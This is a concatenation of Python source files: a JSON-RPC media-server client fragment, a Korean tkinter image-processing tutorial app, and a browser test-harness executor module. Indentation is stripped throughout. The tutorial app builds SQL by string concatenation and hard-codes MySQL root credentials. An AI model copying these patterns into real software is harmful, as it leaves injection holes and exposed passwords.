def create(self, obj_type, **args):
return self._rpc("create", type=obj_type, constructorParams=args)
def invoke(self, object_id, operation, **args):
if args:
return self._rpc("invoke", object=object_id, operation=operation, operationParams=args)
else:
return self._rpc("invoke", object=object_id, operation=operation)
def subscribe(self, object_id, event_type, fn):
subscription_id = self._rpc("subscribe", object=object_id, type=event_type)
# self.subscriptions[subscription_id] = fn
# kurento 6.0 protocol workaround...
if object_id not in self.on_event:
self.on_event[object_id] = {}
self.on_event[object_id][event_type] = fn
return subscription_id
def unsubscribe(self, subscription_id):
del self.subscriptions[subscription_id]
return self._rpc("unsubscribe", subscription=subscription_id)
def release(self, object_id):
return self._rpc("release", object=object_id)
|
day12_04.py
|
## Histogram
# Processing techniques such as embossing and sharpening
from statistics import median
from tkinter import *
import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import matplotlib.pyplot as plt
## Function definitions
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # check the file size
inH = inW = int(math.sqrt(fsize)) # determine the input buffer size (important!)
inImage = []; tmpList = []
for i in range(inH) : # allocate the input buffer (initialized to 0)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load data from the file into memory
fp = open(fname, 'rb') # open the file (binary mode)
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # file --> input buffer
equal() # input buffer --> output buffer
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# remove any existing canvas.
if canvas != None :
canvas.destroy()
# prepare the display area (fixed size)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # if the image is smaller than the view
VIEW_X = outW
VIEW_Y = outH
step = 1 # number of pixels to skip
else :
step = int(outW / VIEW_X)
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_Y/2), image=paper, state='normal')
# draw to the screen
def putPixel() :
for i in range(0, outH,step) :
for k in range(0, outW,step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # identity (copy) image algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # brighten image algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # statistics (sum, average, max, min, median) of the input/output images
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum, rawMax, rawMin, rawMedian = 0, 0, 0, 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawSum = rawSum
inRawAvg = int(rawSum / (inH * inW))
rawMax = max(map(max, inImage))
rawMin = min(map(min, inImage))
rawMedian = int(median(map(median, inImage)))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # sub-window owned by the parent (window)
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 합계 -->' + str(inRawSum))
label1.pack()
label2 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
label2.pack()
label3 = Label(subWindow, text='입력영상 최댓값 -->' + str(rawMax))
label3.pack()
label4 = Label(subWindow, text='입력영상 최소값 -->' + str(rawMin))
label4.pack()
label5 = Label(subWindow, text='입력영상 중위수 -->' + str(rawMedian))
label5.pack()
subWindow.mainloop()
def upDown() : # vertical flip algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[outH-1-i][k] = inImage[i][k]
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # mouse press handler (start of panning)
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # mouse release handler (finish panning)
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# important! determine the size of the output buffer
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # shrink (zoom out) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outH):
for k in range(outW):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Row', 'Column', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outH):
for col in range(outW):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # determine the input buffer size (important!)
inImage = []; tmpList = []
for i in range(inH) : # allocate the input buffer (initialized to 0)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load data from the file into memory
fp = open(fname, 'r') # open the file (text mode)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # file --> input buffer
equal() # input buffer --> output buffer
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # open (or create) the database
cur = con.cursor() # create a cursor for executing queries
# 열이름 리스트 만들기
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + ", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) +"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # open (or connect to) the database
cur = con.cursor() # create a cursor for executing queries
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## Inner function: a local function defined inside another function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" +fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate the input buffer (initialized to 0)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # open (or connect to) the database
cur = con.cursor() # create a cursor for executing queries
# build the list of column names
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + ", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" +fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(outH) :
for k in range(outW) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) +"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.98.131', user='root',
password='1234', db='imageDB', charset='utf8') # open (or connect to) the database
cur = con.cursor() # create a cursor for executing queries
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
######## Inner function: a local function defined inside another function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" +fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # allocate the input buffer (initialized to 0)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w', defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
ws.set_column(0, outW, 1.0) # roughly 0.34
for r in range(outH):
ws.set_row(r, 9.5) # roughly 0.35
for rowNum in range(outH) :
for colNum in range(outW) :
data = outImage[rowNum][colNum]
# use the data value as the cell background color (#000000~#FFFFFF)
if data > 15 :
hexStr = '#' + (hex(data)[2:])*3
else :
hexStr = '#' + ('0' + hex(data)[2:]) * 3
# prepare the cell format
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histogram() : # histogram of the output image
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
normalList = [0]*256
countList = [0]*256
for i in range(outH):
for k in range(outW):
value = outImage[i][k]
countList[value] += 1
# normalized value = (count - min) * HIGH / (max - min)
maxVal = max(countList)
minVal = min(countList)
for i in range(len(countList)):
normalList[i] = (countList[i] - minVal)*256/(maxVal-minVal)
# draw to the screen
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width = 256, height = 256)
subPaper = PhotoImage(width = 256, height = 256)
subCanvas.create_image((256/2,256/2), image = subPaper, state = 'normal')
for i in range(0,256) :
for k in range(0, int(normalList[i])):
data = 0
subPaper.put('#%02x%02x%02x' % (data,data,data),(i,255-k))
subCanvas.pack(expand = 1, anchor = CENTER)
subWindow.mainloop()
def a_histogram2() : # histogram of the output image (matplotlib)
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0]*256
for i in range(outH):
for k in range(outW):
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def endInSearch() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH
outImage = []; tmpList = []
value = 0
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
maxVal, minVal, HIGH = 0, 255, 255 # HIGH is fixed
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal:
maxVal = data
if data < minVal :
minVal = data
limit = askinteger("앤드인"," 상하 범위 : ",minvalue = 1, maxvalue = 127)
maxVal -= limit
minVal += limit
# histogram stretching
# new = (old - min) * HIGH / (max - min) : similar to the normalization formula
# out = (in - min) * HIGH / (max - min)
for i in range(inH):
for k in range(inW):
value = int( (inImage[i][k] - minVal) * HIGH / (maxVal-minVal))
if value<0:
value = 0
if value>255:
value =255
outImage[i][k] =value
display()
def embossing() : # embossing
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
MSIZE = 3
mask = [[-1,0,0],[0,0,0],[0,0,1]]
# temporary input image: needs to be 2 pixels larger than inImage in each dimension
# temporary image ==> inImage with a 1-pixel border on every side
tmpInImage = []
for i in range(inH + 2) :
tmpList = []
for k in range(inW + 2) :
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpOutImage.append(tmpList)
# original input --> temporary input
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
# convolution: slide the mask over the image, multiply and accumulate
for i in range(1, inH + 1):
for k in range(1, inW + 1):
# process one pixel with the 3x3 mask: multiply each neighbor and sum
S = 0.0
for m in range(0, MSIZE):
for n in range(0, MSIZE):
S += mask[m][n] * tmpInImage[i + (m - 1)][k + (n - 1)]
tmpOutImage[i - 1][k - 1] = S
# add 127 (the mask coefficients sum to 0, so results are centered around 0)
for i in range(outH) :
for k in range(outW) :
tmpOutImage[i][k] += 127
# temporary output --> real output, clamped to the 0-255 range
for i in range(outH) :
for k in range(outW) :
value = int(tmpOutImage[i][k])
value = max(0, min(255, value))
outImage[i][k] = value
display()
def histogramStretch() : # histogram stretching algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW; outH = inH
outImage = []; tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
maxVal, minVal, HIGH = 0, 255, 255 # HIGH is fixed
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal:
maxVal = data
if data < minVal :
minVal = data
# histogram stretching
# new = (old - min) * HIGH / (max - min) : similar to the normalization formula
# out = (in - min) * HIGH / (max - min)
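# Worked example (illustrative values): with minVal=50 and maxVal=200,
# a pixel of 125 maps to int((125 - 50) * 255 / 150) = 127.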
for i in range(inH):
for k in range(inW):
value = int( (inImage[i][k] - minVal) * HIGH / (maxVal-minVal))
if value<0:
value = 0
if value>255:
value =255
outImage[i][k] =value
display()
def histogramEqual():
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the size of the output buffer
outW = inW
outH = inH
outImage = []
tmpList = []
for i in range(outH): # allocate the output buffer (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
histo = [0]*256
sumHisto = [0]*256
normalHisto = [0]*256
HIGH = 255 # HIGH is fixed
# build the histogram
for i in range(inH):
for k in range(inW):
value = inImage[i][k]
histo[value] += 1
# build the cumulative histogram
sVal = 0
for i in range(len(histo)):
sVal += histo[i]
sumHisto[i] = sVal
# normalized cumulative histogram: (cumulative sum / (rows * cols)) * HIGH
for i in range(len(sumHisto)) :
normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
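# Worked example (illustrative values): for a 256x256 image (65536 pixels),
# a grey level whose cumulative count is 32768 maps to
# int(32768 / 65536 * 255) = 127, i.e. the median level ends up at mid-grey.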
# write the output using the normalized values
for i in range(inH):
for k in range(inW):
index = inImage[i][k]
outImage[i][k] = normalHisto[index]
display()
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## Main code
window = Tk(); window.geometry('400x400')
window.title('영상 처리&데이터 분석 Ver 0.7')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_command(label='히스토그램 스트래칭', command=histogramStretch)
analyzeMenu.add_command(label='앤드-인 탐색', command=endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=histogramEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from six import text_type
from six.moves.http_client import HTTPConnection
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from ..testrunner import Stop
from .protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshot(data):
"""Computes the sha1 checksum of a base64-encoded screenshot."""
return hashlib.sha1(base64.b64decode(data)).hexdigest()
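# A minimal illustrative sketch (not part of the original module): hashing a
# small base64-encoded payload the same way reftest screenshots are hashed
# above. The payload bytes are an arbitrary assumption; any base64 string works
# because hash_screenshot decodes it before taking the sha1 digest.
def _example_hash_screenshot():
    sample = base64.b64encode(b"not a real PNG, just example bytes").decode("ascii")
    return hash_screenshot(sample)  # 40-character hexadecimal sha1 digest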
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
        if not isinstance(item, dict):
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshot(item["screenshot"])
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
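# Illustrative sketch of the external-timeout budget used in TimedRunner.run
# (the numbers are arbitrary examples, not values from the harness): with a
# 10 second test timeout and the 5 second default extra timeout, the runner
# thread is allowed 10 + 2 * 5 = 20 seconds before the wait gives up.
def _example_external_timeout_budget(timeout=10, extra_timeout=5):
    return timeout + 2 * extra_timeout if timeout else None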
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
            self.logger.warning(traceback.format_exc())
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
scheme = "https" if protocol == "h2" else protocol
return "%s://%s:%s" % (scheme,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
